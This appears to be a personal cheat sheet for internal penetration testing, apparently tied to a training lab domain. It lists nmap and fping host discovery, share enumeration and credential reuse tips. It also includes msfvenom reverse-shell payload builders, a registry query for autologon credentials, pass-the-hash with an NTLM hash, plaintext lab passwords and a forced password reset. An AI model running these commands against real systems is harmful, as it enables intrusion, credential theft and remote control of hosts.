Internal Pentest

When inside the target network:

• Start ligolo for pivoting.

• Run nmap/fping scan to find live hosts.

• Find open ports on the hosts.

# Scan for live hosts in the network
fping -g <subnet> | grep -v "unreachable" | awk '{print $1}'
nmap -sn -vv <subnet> -oN live_hosts

# Scan top 100 ports with slow speed to avoid issues in tunnel
nmap -F -iL live_hosts -T2 -vv -Pn -oN nmap_scan

• Enumerate common services.

• Start with trying to read SMB or NFS shares.

• Spend time on HTTP websites if available, potentially get foothold on the host.

Found new creds???

• Enumerate shares again.

• Check the password on the users you dont know the password of.

• Try to re-use it everywhere.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o shell.exe

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f elf -o shell.elf

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp

autologon username: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName

netexec smb 172.16.8.20 -u 'Administrator' -H '0e20798f695ab0d04bc138b22344cea8' --local-auth

smbclient -U 'inlanefreight.local\hporter%Gr8hambino!' //172.16.8.3/SYSVOL

crackmapexec --users cat dusers | awk '{print $5}' | sort | uniq

net rpc password "ssmalls" 'Gr8hambino!' -U "inlanefreight.local"/"hporter"%'Gr8hambino!' -S "dc01.inlanefreight.local"